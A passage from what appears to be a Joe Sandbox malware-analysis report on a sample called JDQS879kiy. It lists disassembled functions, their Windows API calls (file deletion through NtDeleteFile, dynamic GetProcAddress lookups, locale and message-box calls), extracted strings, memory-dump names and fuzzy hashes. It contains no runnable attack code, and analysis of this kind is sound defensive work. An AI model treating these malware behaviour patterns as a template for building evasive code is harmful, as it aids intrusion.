                        • NtDeleteFile.NTDLL(?), ref: 0285DED5
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: Path$DeleteFileInitNameName_StringUnicode
                        • String ID:
                        • API String ID: 1459852867-0
                        • Opcode ID: fad174f4c64f1572e94b804f68f519fcf457b6d05178bd024d47fd40d1e0581d
                        • Instruction ID: daca44f36728d9296d7f4b2111f739f27824d997e219caa8dabb68cfed3a01d9
                        • Opcode Fuzzy Hash: fad174f4c64f1572e94b804f68f519fcf457b6d05178bd024d47fd40d1e0581d
                        • Instruction Fuzzy Hash: 7F01867EA4535C6EEB05E7E4CD81BDD77BEAB54704F5000E29A00E6192DB746B088B22
                        Function 0285DE78 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 02844ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02844EDA
                        • RtlInitUnicodeString.NTDLL(?,?), ref: 0285DEA0
                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0285DEF2), ref: 0285DEB6
                        • NtDeleteFile.NTDLL(?), ref: 0285DED5
                          • Part of subcall function 02844C0C: SysFreeString.OLEAUT32(0285ED84), ref: 02844C1A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                        • String ID:
                        • API String ID: 1694942484-0
                        • Opcode ID: 9fc3652d9bff851e51bf84785843ba3892d4c213fe68da6b196b06230708364a
                        • Instruction ID: bf25ccdfa47a947b259637e837c88680fcea248115c78368b809f4d42a056042
                        • Opcode Fuzzy Hash: 9fc3652d9bff851e51bf84785843ba3892d4c213fe68da6b196b06230708364a
                        • Instruction Fuzzy Hash: A601F47D94020CBBEB11EBE4CD41FDEB3BDDB58700F5044B1AA00E2580EB746B048A66
                        Function 02847F54 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                        Download Yara Rule
                        APIs
                        • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02847F75
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: DiskFreeSpace
                        • String ID:
                        • API String ID: 1705453755-0
                        • Opcode ID: 0fbec54a0c02fd547ee90df4e96e63df58f4455ae2e88ae87e717fe42b60fd3b
                        • Instruction ID: 57dfcb1ce5e4bb0889c7e3497fc295a7448d71dc8489575a04b3e4f8afd4b2f3
                        • Opcode Fuzzy Hash: 0fbec54a0c02fd547ee90df4e96e63df58f4455ae2e88ae87e717fe42b60fd3b
                        • Instruction Fuzzy Hash: 521100B5A00209AF9B04CF99C8809AFF7F9EFC8304B14C569A508EB254E6319A018B90
                        Function 0284A744 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                        Download Yara Rule
                        APIs
                        • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0284A762
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: InfoLocale
                        • String ID:
                        • API String ID: 2299586839-0
                        • Opcode ID: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                        • Instruction ID: 92b19c02354e62d5e09d0f1783b568b67ab5b86e4e617b3c7cde9719b5e652bb
                        • Opcode Fuzzy Hash: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                        • Instruction Fuzzy Hash: 49E0927D70021C17D725A56C9C90EE6726D9758310F00416EA949C7341FDA09D404AE5
                        Function 0284B70C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                        Download Yara Rule
                        APIs
                        • GetVersionExA.KERNEL32(?,0286D106,00000000,0286D11E), ref: 0284B71A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: Version
                        • String ID:
                        • API String ID: 1889659487-0
                        • Opcode ID: 05a954cca16e272370f9ac1cd0eabebbd08e692cd4d9096e269619fd2c2a0f33
                        • Instruction ID: bd4ea4058d532894ae9686f37fb93dc679f14eecc216d1eb4e45c111eb76b72e
                        • Opcode Fuzzy Hash: 05a954cca16e272370f9ac1cd0eabebbd08e692cd4d9096e269619fd2c2a0f33
                        • Instruction Fuzzy Hash: A0F09DBC9443099FD350DF28D548F1677E9FB48A14F009929EA99CB380EB3498258B52
                        Function 0284A790 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                        Download Yara Rule
                        APIs
                        • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0284BDF2,00000000,0284C00B,?,?,00000000,00000000), ref: 0284A7A3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: InfoLocale
                        • String ID:
                        • API String ID: 2299586839-0
                        • Opcode ID: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                        • Instruction ID: 4a73c2ce80b84b08131b160259976303dd64fce198b23586b0fdfc296b97111e
                        • Opcode Fuzzy Hash: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                        • Instruction Fuzzy Hash: 03D05EAE34E2682BA324915A2D94DBB5AFCCAC67A5F00403EF68CCA201D6008C05D6F1
                        Function 0284918C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: LocalTime
                        • String ID:
                        • API String ID: 481472006-0
                        • Opcode ID: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                        • Instruction ID: cc3599c40f846ac031ef85725bdf38cdc6143ffdebfe423c99217c6dcbc8bc96
                        • Opcode Fuzzy Hash: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                        • Instruction Fuzzy Hash: 0DA01108808830028A803B2C0C022BA3088A802A20FC80F80A8F8802E2FE2E022080E3
                        Function 028420C4 Relevance: .1, Instructions: 94COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                        • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                        • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                        • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                        Function 0284D214 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0284D21D
                          • Part of subcall function 0284D1E8: GetProcAddress.KERNEL32(00000000), ref: 0284D201
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                        • API String ID: 1646373207-1918263038
                        • Opcode ID: caa36d2e5a7bfb816cba67cab382938037002d5785464d4efd596bc924bb28cf
                        • Instruction ID: 661224508fb9e453780601135ffdfed1d7c9354caa94bcc88eaf57b803288b48
                        • Opcode Fuzzy Hash: caa36d2e5a7bfb816cba67cab382938037002d5785464d4efd596bc924bb28cf
                        • Instruction Fuzzy Hash: 3A410F7DA8520C5B66186B6D7400427FFDED7C87103E0841BFE14CB788EEB4BD598A6A
                        Function 02856E58 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02856E5E
                        • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02856E6F
                        • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02856E7F
                        • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02856E8F
                        • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02856E9F
                        • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02856EAF
                        • GetProcAddress.KERNEL32 ref: 02856EBF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: AddressProc$HandleModule
                        • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                        • API String ID: 667068680-2233174745
                        • Opcode ID: 7808ec168517a98ccf4247daccc985482942a37ce2f0d9fe4f6501356409a85e
                        • Instruction ID: 1c1269691be2409520e74f4c7c5bec474fff1068001d6c48959b7c8d80d6a7a0
                        • Opcode Fuzzy Hash: 7808ec168517a98ccf4247daccc985482942a37ce2f0d9fe4f6501356409a85e
                        • Instruction Fuzzy Hash: 11F04CADE853756FB3107F789C85C272B5EAE11B463502829E802E5A43FF7A84244F66
                        Function 02842530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                        Download Yara Rule
                        APIs
                        • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 028428CE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: Message
                        • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                        • API String ID: 2030045667-32948583
                        • Opcode ID: ad2d030f8d4a090984047e4bc9d3355fbe5d0ca1bd76e67b8fa312556b4b8325
                        • Instruction ID: a715ed48d8c5f1016263e3a88e60b12e4f91aaf9bf9dfb0464ec0437a79bf5c9
                        • Opcode Fuzzy Hash: ad2d030f8d4a090984047e4bc9d3355fbe5d0ca1bd76e67b8fa312556b4b8325
                        • Instruction Fuzzy Hash: B7A1E73CA0825C8BDB219A2CCC84B98BAE5EB09354F1441E5FD4DDB28ACF7599C9CF51
                        Function 0284252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                        Download Yara Rule
                        Strings
                        • Unexpected Memory Leak, xrefs: 028428C0
                        • , xrefs: 02842814
                        • 7, xrefs: 028426A1
                        • An unexpected memory leak has occurred. , xrefs: 02842690
                        • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02842849
                        • The unexpected small block leaks are:, xrefs: 02842707
                        • bytes: , xrefs: 0284275D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID:
                        • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                        • API String ID: 0-2723507874
                        • Opcode ID: a35b316d4ce7857a541248ddfe6c4fcb9999432fdb603f2ba18a1dc4e116bb61
                        • Instruction ID: 447d86a36a112c8ae5560ce847c47ae59852dfb594e6aa1211eab23f23e0df3c
                        • Opcode Fuzzy Hash: a35b316d4ce7857a541248ddfe6c4fcb9999432fdb603f2ba18a1dc4e116bb61
                        • Instruction Fuzzy Hash: 4271E23CA0829C8FDB219A2CCC84B98BAE5EB09344F1041E5F94DD728ADF7559C5CF52
                        Function 0284BD40 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                        Download Yara Rule
                        APIs
                        • GetThreadLocale.KERNEL32(00000000,0284C00B,?,?,00000000,00000000), ref: 0284BD76
                          • Part of subcall function 0284A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0284A762
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: Locale$InfoThread
                        • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                        • API String ID: 4232894706-2493093252
                        • Opcode ID: d2aa90c46125fdbabb7ae8ffc941f4dac37fa22a47bc20b50ba699a626df9dde
                        • Instruction ID: 4239f7aeaa1bb26cf3b91d246220d77a43f60eb7daac86067dd6918dc8a3c5a1
                        • Opcode Fuzzy Hash: d2aa90c46125fdbabb7ae8ffc941f4dac37fa22a47bc20b50ba699a626df9dde
                        • Instruction Fuzzy Hash: F861723CB4124C9BEB04EBA8D860B9FB7BB9B48304F109436E205DB741DE39D9099B52
                        Function 0285AE18 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON
                        Download Yara Rule
                        APIs
                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 0285AE38
                        • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 0285AE4F
                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 0285AEE3
                        • IsBadReadPtr.KERNEL32(?,00000002), ref: 0285AEEF
                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 0285AF03
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: Read$HandleModule
                        • String ID: KernelBase$LoadLibraryExA
                        • API String ID: 2226866862-113032527
                        • Opcode ID: 30f5af31ae9e5d50ed1fe4e892ac46315b9d0fa741004e9e0dcf6e594d9a8cd0
                        • Instruction ID: d02ea8964291d84ad9e54aca1bf024925d05252c7964030c10e7b27d7ac65e4e
                        • Opcode Fuzzy Hash: 30f5af31ae9e5d50ed1fe4e892ac46315b9d0fa741004e9e0dcf6e594d9a8cd0
                        • Instruction Fuzzy Hash: F43162BD640229BBDB24DF68CCC5F5A77A8AF05768F044610EE58DB281D730A940CBA1
                        Function 0284432C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028443F3,?,?,028A17C8,?,?,0286E7A8,0284655D,0286D30D), ref: 02844365
                        • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028443F3,?,?,028A17C8,?,?,0286E7A8,0284655D,0286D30D), ref: 0284436B
                        • GetStdHandle.KERNEL32(000000F5,028443B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028443F3,?,?,028A17C8), ref: 02844380
                        • WriteFile.KERNEL32(00000000,000000F5,028443B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028443F3,?,?), ref: 02844386
                        • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 028443A4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: FileHandleWrite$Message
                        • String ID: Error$Runtime error at 00000000
                        • API String ID: 1570097196-2970929446
                        • Opcode ID: a5cf74dcb8bd30c31d9b0a2af49b9e04a713432dfddcec4400594a0077b7f370
                        • Instruction ID: 78ac3661daa44db2ea3f320eb8ba27c4cf31080ccd39bee7e9a20aef35158326
                        • Opcode Fuzzy Hash: a5cf74dcb8bd30c31d9b0a2af49b9e04a713432dfddcec4400594a0077b7f370
                        • Instruction Fuzzy Hash: CCF0F07CAC434C7AFA14A3A4AC0EFA9235C0710F19F180A04B338E84C09FE450C48B27
                        Function 0284AE44 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0284ACBC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0284ACD9
                          • Part of subcall function 0284ACBC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0284ACFD
                          • Part of subcall function 0284ACBC: GetModuleFileNameA.KERNEL32(02840000,?,00000105), ref: 0284AD18
                          • Part of subcall function 0284ACBC: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0284ADAE
                        • CharToOemA.USER32(?,?), ref: 0284AE7B
                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0284AE98
                        • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0284AE9E
                        • GetStdHandle.KERNEL32(000000F4,0284AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0284AEB3
                        • WriteFile.KERNEL32(00000000,000000F4,0284AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0284AEB9
                        • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 0284AEDB
                        • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0284AEF1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                        • String ID:
                        • API String ID: 185507032-0
                        • Opcode ID: ac1fa77ee74ca70368e733e944677d9ee8ef990212362333388ae45d0e34be99
                        • Instruction ID: 60ccfcd1120a7842db37e25678f59960763b40c72733bb2ddaa6ce3fc6658563
                        • Opcode Fuzzy Hash: ac1fa77ee74ca70368e733e944677d9ee8ef990212362333388ae45d0e34be99
                        • Instruction Fuzzy Hash: C8111CBE588208ABD300EB98CC85F9F77EDAB45700F440A19B754D61D1EE74E9448B67
                        Function 0284E50C Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                        Download Yara Rule
                        APIs
                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0284E5A5
                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0284E5C1
                        • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0284E5FA
                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0284E677
                        • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0284E690
                        • VariantCopy.OLEAUT32(?,00000000), ref: 0284E6C5
                        Memory Dump Source
